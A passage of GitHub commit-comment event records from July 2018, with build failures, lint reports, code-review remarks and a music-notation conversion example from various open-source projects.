{"id":"7922277522","type":"CommitCommentEvent","actor":{"login":"daid"},"repo":{"name":"daid/Mario"},"payload":{"comment":{"id":29604314,"position":null,"line":null,"path":null,"commit_id":"676f8fec18ba01ea786a7cb0862841f6147e23d3","created_at":"2018-07-05T10:15:11Z","updated_at":"2018-07-05T10:15:11Z","author_association":"OWNER","body":"TinyCI build failure:\n[cmake /home/daid/_tinyci/daid/Mario] returned [1]:\n```-- Configuring incomplete, errors occurred!\nSee also \"/home/daid/_tinyci/daid/Mario/_build/CMakeFiles/CMakeOutput.log\".\n\nCMake Error at CMakeLists.txt:7 (find_package):\n  By not providing \"FindSeriousProton2.cmake\" in CMAKE_MODULE_PATH this\n  project has asked CMake to find a package configuration file provided by\n  \"SeriousProton2\", but CMake did not find one.\n\n  Could not find a package configuration file provided by \"SeriousProton2\"\n  with any of the following names:\n\n    SeriousProton2Config.cmake\n    seriousproton2-config.cmake\n\n  Add the installation prefix of \"SeriousProton2\" to CMAKE_PREFIX_PATH or set\n  \"SeriousProton2_DIR\" to a directory containing one of the above files.  If\n  \"SeriousProton2\" provides a separate development package or SDK, be sure it\n  has been installed.\n\n\n```"}},"created_at":"2018-07-05T10:15:11Z"}
{"id":"7922282282","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29604326,"position":null,"line":null,"path":null,"commit_id":"98fa7f81c327f7590d0cd69853c8a783155b78ea","created_at":"2018-07-05T10:16:07Z","updated_at":"2018-07-05T10:16:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#ci-246](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#ci-246).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-246-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-05T10:16:07Z"}
{"id":"7922289250","type":"CommitCommentEvent","actor":{"login":"Thorin-Oakenpants"},"repo":{"name":"ghacksuserjs/ghacks-user.js"},"payload":{"comment":{"id":29604331,"position":null,"line":null,"path":null,"commit_id":"70abeda9d495edd72d5ca580233af17994e9ba49","created_at":"2018-07-05T10:17:32Z","updated_at":"2018-07-05T10:17:32Z","author_association":"MEMBER","body":"https://github.com/ghacksuserjs/ghacks-user.js/commit/d34894e9656cddcdf32c177a15e088e2316e0543"}},"created_at":"2018-07-05T10:17:32Z"}
{"id":"7922295023","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"nhibernate/nhibernate-core"},"payload":{"comment":{"id":29604351,"position":null,"line":null,"path":null,"commit_id":"5d77746809f3f9aaaad0ebcf874becef015067ae","created_at":"2018-07-05T10:18:42Z","updated_at":"2018-07-05T10:18:42Z","author_association":"MEMBER","body":"The related PR is #1709 (Lazy properties static proxy), which is a follow-up to #1451 (New StaticProxyFactoryFactory).\r\n\r\nThese are performance related changes.\r\n\r\nThe dynamic proxy heavily relies on reflection not only when built, but also when run. It is a general purpose proxifying mechanism, originating from an external proxy library ([LinFu.DynamicProxy](https://github.com/philiplaureano/LinFu.DynamicProxy), also on [Nuget](https://www.nuget.org/packages/LinFu.DynamicProxy.OfficialRelease/)).\r\n\r\nThe static proxy still relies on reflection for getting built, but does no more use reflection afterward. It is tailored to NHibernate needs.\r\n\r\nA bunch of old proxies issues were also fixed in the process, mainly related to serialization or correctness of generated IL, like #1481, #1744, #1728, #1711. (Invalid IL may not always cause bugs, but better have it valid.)\r\n\r\nIn its current state, the static proxy will not allow adding your aspects. You can still derive from the `AbstractProxyFactory`, copy most of the [`StaticProxyFactory`](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/StaticProxyFactory.cs) implementation and add additional interfaces to implement. But the [`NHibernateProxyBuilder`](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs) will not allow to customize their implementation and will instead [attempt to forward these additional interfaces calls to the proxified class implementation](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L137).\r\n\r\nI guess your application is using its `ViewModelProxyFactory` directly, for ensuring all entities get proxified whatever the way they have been loaded. In such case, you should re-implement it by using the original [LinFu.DynamicProxy](https://github.com/philiplaureano/LinFu.DynamicProxy) instead I think."}},"created_at":"2018-07-05T10:18:42Z"}
{"id":"7922303974","type":"CommitCommentEvent","actor":{"login":"IqubalAhmed"},"repo":{"name":"IqubalAhmed/Demo4"},"payload":{"comment":{"id":29604364,"position":null,"line":null,"path":null,"commit_id":"6d57bc3180b52b3e8fd87c96b98162ec58f215a7","created_at":"2018-07-05T10:20:31Z","updated_at":"2018-07-05T10:20:31Z","author_association":"OWNER","body":"class HelloWorld{\r\n}"}},"created_at":"2018-07-05T10:20:31Z"}
{"id":"7922306059","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29604365,"position":null,"line":null,"path":null,"commit_id":"98b0ebd3155c7389e3dc657239c8bed5248ab665","created_at":"2018-07-05T10:20:57Z","updated_at":"2018-07-05T10:20:57Z","author_association":"CONTRIBUTOR","body":"This commit implements single-note hairpins in the Humdrum-to-MEI converter.\r\n\r\nExample:\r\n\r\n<img width=\"295\" alt=\"screen shot 2018-07-05 at 12 17 52 pm\" src=\"https://user-images.githubusercontent.com/3487289/42317843-a2759f22-804d-11e8-9124-f1fd5238f4e2.png\">\r\n\r\nHumdrum input:\r\n\r\n```\r\n**kern\t**kern\t**dynam\r\n8dn' 8a\t8ffn 8fffn\t<[\r\n8dn' 8a\t8ffn 8fffn\t>]\r\n=\t=\t=\r\n*-\t*-\t*-\r\n```\r\n\r\nMEI output:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-05T12:19:55\" version=\"2.0.0-dev-b3eaed9-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001343011975\">\r\n                <score xml:id=\"score-0000001949133855\">\r\n                    <scoreDef xml:id=\"scoredef-0000001188242604\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000145764773\" symbol=\"brace\" barthru=\"true\">\r\n                            <staffDef xml:id=\"staffdef-0000000175369763\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000341743782\" />\r\n                            </staffDef>\r\n                            <staffDef xml:id=\"staffdef-0000000420821731\" clef.shape=\"G\" clef.line=\"2\" n=\"2\" lines=\"5\" />\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000001721266898\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F2N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L2F2\" dur=\"8\">\r\n                                        <note xml:id=\"note-L2F2S1\" oct=\"5\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L2F2S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L2F2S2\" oct=\"6\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L2F2S2\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L3F2\" dur=\"8\">\r\n                                        <note xml:id=\"note-L3F2S1\" oct=\"5\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L3F2S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L3F2S2\" oct=\"6\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L3F2S2\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-0000000580545949\" n=\"2\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L2F1\" dur=\"8\">\r\n                                        <note xml:id=\"note-L2F1S1\" oct=\"4\" pname=\"d\">\r\n                                            <accid xml:id=\"accid-L2F1S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L2F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <artic xml:id=\"artic-L2F1\" artic=\"stacc\" />\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L3F1\" dur=\"8\">\r\n                                        <note xml:id=\"note-L3F1S1\" oct=\"4\" pname=\"d\">\r\n                                            <accid xml:id=\"accid-L3F1S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L3F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <artic xml:id=\"artic-L3F1\" artic=\"stacc\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <hairpin xml:id=\"hairpin-L2F3\" staff=\"1\" tstamp=\"1.000000\" tstamp2=\"0m+1.5\" form=\"cres\" vgrp=\"100\" />\r\n                            <hairpin xml:id=\"hairpin-L3F3\" staff=\"1\" tstamp=\"1.500000\" tstamp2=\"0m+2.0\" form=\"dim\" vgrp=\"100\" />\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-05T10:20:57Z"}
{"id":"7922309983","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29604370,"position":null,"line":null,"path":null,"commit_id":"29c85cb8da246829315ba6c98191e746c8b22b67","created_at":"2018-07-05T10:21:45Z","updated_at":"2018-07-05T10:21:45Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/22/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-05T10:21:45Z"}
{"id":"7922311779","type":"CommitCommentEvent","actor":{"login":"IqubalAhmed"},"repo":{"name":"IqubalAhmed/Demo4"},"payload":{"comment":{"id":29604371,"position":null,"line":null,"path":null,"commit_id":"6d57bc3180b52b3e8fd87c96b98162ec58f215a7","created_at":"2018-07-05T10:22:08Z","updated_at":"2018-07-05T10:22:08Z","author_association":"OWNER","body":"Modified HelloWorld from Github"}},"created_at":"2018-07-05T10:22:08Z"}
{"id":"7922314758","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29604377,"position":null,"line":null,"path":null,"commit_id":"cdd5dd3805816a2dcd9605a7570ff50a135e6776","created_at":"2018-07-05T10:22:43Z","updated_at":"2018-07-05T10:22:43Z","author_association":"NONE","body":"Already tried recently  [here](http://tests.stockfishchess.org/tests/view/5b114c830ebc596e9e0881f3)"}},"created_at":"2018-07-05T10:22:43Z"}
{"id":"7922316652","type":"CommitCommentEvent","actor":{"login":"bogroot"},"repo":{"name":"bogroot/LeetCode"},"payload":{"comment":{"id":29604378,"position":null,"line":null,"path":null,"commit_id":"1ec7dab013cf5ebd79d208e91da40fea1429590a","created_at":"2018-07-05T10:23:08Z","updated_at":"2018-07-05T10:23:08Z","author_association":"OWNER","body":"c++"}},"created_at":"2018-07-05T10:23:08Z"}
{"id":"7922317997","type":"CommitCommentEvent","actor":{"login":"rederep"},"repo":{"name":"J-18-01/recruitLabs"},"payload":{"comment":{"id":29604379,"position":null,"line":null,"path":null,"commit_id":"2f30ca1c858a6f9772ba5be5b4c73af70648c0a3","created_at":"2018-07-05T10:23:25Z","updated_at":"2018-07-05T10:23:25Z","author_association":"COLLABORATOR","body":"rename developerList to developerListBD"}},"created_at":"2018-07-05T10:23:25Z"}
{"id":"7922341778","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":29604418,"position":null,"line":null,"path":null,"commit_id":"4eb26c00503333e90112a3d800229809bfddaae8","created_at":"2018-07-05T10:28:26Z","updated_at":"2018-07-05T10:28:26Z","author_association":"MEMBER","body":"Good catch. Seems inter-board sync is working a bit better, though I could only test it a few times due to  https://github.com/sinara-hw/sinara/issues/567."}},"created_at":"2018-07-05T10:28:26Z"}
{"id":"7922348902","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29604432,"position":null,"line":null,"path":null,"commit_id":"cdd5dd3805816a2dcd9605a7570ff50a135e6776","created_at":"2018-07-05T10:29:57Z","updated_at":"2018-07-05T10:29:57Z","author_association":"OWNER","body":"In this attempt, I don't remove the reduction of ttCapture. All ttMoves are reduced regardless of capture."}},"created_at":"2018-07-05T10:29:57Z"}
{"id":"7922351202","type":"CommitCommentEvent","actor":{"login":"delcypher"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29604441,"position":null,"line":null,"path":null,"commit_id":"094e5f339071fbaa7141dc7b659ffae9965723b2","created_at":"2018-07-05T10:30:25Z","updated_at":"2018-07-05T10:30:25Z","author_association":"NONE","body":"@futurejones : @petrhosek is not really the appropriate person to ask. @petrhosek does not work on swift and swift-compiler-rt is a downstream consumer of upstream compiler-rt.\r\n\r\nIt needs to be someone who work Swift's compiler-rt. Although I have worked on swift-compiler-rt in the past I'm not sure if `swift-4.2-branch` and `stable` are accepting new changes. @cheshire @kubamracek might know."}},"created_at":"2018-07-05T10:30:25Z"}
{"id":"7922352123","type":"CommitCommentEvent","actor":{"login":"senthiln0281"},"repo":{"name":"senthiln0281/test"},"payload":{"comment":{"id":29604443,"position":null,"line":null,"path":null,"commit_id":"13c3935f849ce7ea8b525fee2684d57ccb21f605","created_at":"2018-07-05T10:30:35Z","updated_at":"2018-07-05T10:30:35Z","author_association":"OWNER","body":"recover"}},"created_at":"2018-07-05T10:30:35Z"}
{"id":"7922353724","type":"CommitCommentEvent","actor":{"login":"dceejay"},"repo":{"name":"dceejay/RedMap"},"payload":{"comment":{"id":29604453,"position":null,"line":null,"path":null,"commit_id":"15b8efe6b228c5aec1aac3235d0c871808a07317","created_at":"2018-07-05T10:30:56Z","updated_at":"2018-07-05T10:30:56Z","author_association":"OWNER","body":"yes - is on npm - should be in manage palette menu now"}},"created_at":"2018-07-05T10:30:56Z"}
{"id":"7922356898","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604461,"position":61,"line":61,"path":"idea/src/org/jetbrains/kotlin/idea/quickfix/WrapWithCollectionLiteralCallFix.kt","commit_id":"7a6a7877c7ed98318125b7ca17f762d5d841061c","created_at":"2018-07-05T10:31:36Z","updated_at":"2018-07-05T10:31:36Z","author_association":"MEMBER","body":"It's not that should be fixed in this commit, but an improvement to consider. Should wrapping fix be suggested for such cases? \r\n\r\n```\r\nfun test() {\r\n    val test: List<String?> = null\r\n}\r\n```"}},"created_at":"2018-07-05T10:31:36Z"}
{"id":"7922366244","type":"CommitCommentEvent","actor":{"login":"goodwinnk"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604475,"position":4,"line":3979,"path":"idea/tests/org/jetbrains/kotlin/idea/quickfix/QuickFixMultiFileTestGenerated.java","commit_id":"7a6a7877c7ed98318125b7ca17f762d5d841061c","created_at":"2018-07-05T10:33:35Z","updated_at":"2018-07-05T10:33:35Z","author_association":"MEMBER","body":"`QuickFixMultiFileTestGenerated.java.172` should be updated."}},"created_at":"2018-07-05T10:33:35Z"}
{"id":"7922367484","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29604479,"position":null,"line":null,"path":null,"commit_id":"46533f7f5f0747128317c87efa3f6ddf03cc5b96","created_at":"2018-07-05T10:33:51Z","updated_at":"2018-07-05T10:33:51Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 682](https://travis-ci.org/per1234/arduino-ci-script/builds/400346223) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00682-001-tsv"}},"created_at":"2018-07-05T10:33:51Z"}
{"id":"7922368015","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29604480,"position":null,"line":null,"path":null,"commit_id":"46533f7f5f0747128317c87efa3f6ddf03cc5b96","created_at":"2018-07-05T10:33:58Z","updated_at":"2018-07-05T10:33:58Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 682](https://travis-ci.org/per1234/arduino-ci-script/builds/400346223) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00682"}},"created_at":"2018-07-05T10:33:58Z"}
{"id":"7922368599","type":"CommitCommentEvent","actor":{"login":"uu2018"},"repo":{"name":"uu2018/first"},"payload":{"comment":{"id":29604483,"position":null,"line":null,"path":null,"commit_id":"26bb8eae853645892f685ed699c59803add87b63","created_at":"2018-07-05T10:34:06Z","updated_at":"2018-07-05T10:34:06Z","author_association":"OWNER","body":"<a href=\"http://www.baidu.com/link?url=nbXfFFj3xhmDw45CSRmLc8Zu7nWOZd5WmxxDxGe0eT8kWdx1_rL9KZ6mmAk9ckBH1D51xC1Yx853df6SMRQiJq\" target=\"_blank\">"}},"created_at":"2018-07-05T10:34:06Z"}
{"id":"7922370229","type":"CommitCommentEvent","actor":{"login":"maowerner"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604486,"position":75,"line":873,"path":"modules/Correlators.cpp","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T10:34:26Z","updated_at":"2018-07-05T10:34:26Z","author_association":"COLLABORATOR","body":"These we wrong before. We fixed the normalization and fudged them  there to have the tests perform correctly. They are gone in the very next commit \r\n\r\nmaow@coffee:~/Code/sLapH-contractions (master=)$ git diff a4f909e a96ebbf\r\ndiff --git a/modules/Correlators.cpp b/modules/Correlators.cpp\r\nindex fc9550d..2136067 100644\r\n--- a/modules/Correlators.cpp\r\n+++ b/modules/Correlators.cpp\r\n@@ -763,7 +763,7 @@ void Correlators::build_C4cC(RandomVector const &randomvectors,\r\n   // normalisation\r\n   for (int i = 0; i != quantum_num_ids.size(); ++i) {\r\n     for (auto &corr : correlator[i]) {\r\n-      corr /= 3 * Lt;\r\n+      corr /= Lt;\r\n     }\r\n     // write data to file\r\n     filehandle.write(correlator[i], corr_lookup[i]);\r\n@@ -870,7 +870,7 @@ void Correlators::build_C3c(RandomVector const &randomvectors,\r\n   // normalisation\r\n   for (int i = 0; i != quantum_num_ids.size(); ++i) {\r\n     for (auto &corr : correlator[i]) {\r\n-      corr /= 2* Lt;\r\n+      corr /= Lt;\r\n     }\r\n     // write data to file\r\n     filehandle.write(correlator[i], corr_lookup[i]);\r\n@@ -975,7 +975,7 @@ void Correlators::build_C4cB(RandomVector const &randomvectors,\r\n   // normalisation\r\n   for (int i = 0; i != quantum_num_ids.size(); ++i) {\r\n     for (auto &corr : correlator[i]) {\r\n-      corr /= 3 * Lt;\r\n+      corr /= Lt;\r\n     }\r\n     // write data to file\r\n     filehandle.write(correlator[i], corr_lookup[i]);\r\n\r\n(How do I do comments in Code?)"}},"created_at":"2018-07-05T10:34:26Z"}
{"id":"7922371125","type":"CommitCommentEvent","actor":{"login":"TimothyZhang023"},"repo":{"name":"Magisk-Modules-Repo/MiPushFake"},"payload":{"comment":{"id":29604489,"position":3,"line":3,"path":"common/system.prop","commit_id":"0f4726b98cb0cf58b140ab7025ecc14d6489c9d1","created_at":"2018-07-05T10:34:38Z","updated_at":"2018-07-05T10:34:38Z","author_association":"NONE","body":"很多应用会check ro.miui.internal.storage的"}},"created_at":"2018-07-05T10:34:38Z"}
{"id":"7922376151","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29604498,"position":4,"line":3979,"path":"idea/tests/org/jetbrains/kotlin/idea/quickfix/QuickFixMultiFileTestGenerated.java","commit_id":"7a6a7877c7ed98318125b7ca17f762d5d841061c","created_at":"2018-07-05T10:35:45Z","updated_at":"2018-07-05T10:35:45Z","author_association":"MEMBER","body":"Ok :("}},"created_at":"2018-07-05T10:35:45Z"}
{"id":"7922378100","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29604503,"position":null,"line":null,"path":null,"commit_id":"290107e2011fb69743591e751710ae2c33bcdfec","created_at":"2018-07-05T10:36:11Z","updated_at":"2018-07-05T10:36:11Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/25/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad 